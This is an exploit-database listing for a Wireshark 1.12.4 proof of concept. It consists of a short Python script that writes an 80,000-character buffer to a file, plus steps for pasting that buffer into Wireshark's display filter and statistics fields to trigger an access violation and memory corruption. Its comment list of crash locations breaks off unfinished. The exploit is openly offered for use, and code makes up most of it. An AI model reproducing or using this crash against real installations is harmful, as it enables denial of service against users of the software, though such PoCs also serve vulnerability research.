Wireshark 1.12.4 - Memory Corruption and Access Violation PoC



EKU-ID: 4809 CVE: OSVDB-ID:
Author: Avinash Kumar Thapa "-Acid" Published: 2015-05-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis  > 
   
   
buffer = "A"*80000
   
file = open("wireshark.txt","w")
file.write(buffer)
file.close()
   
print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"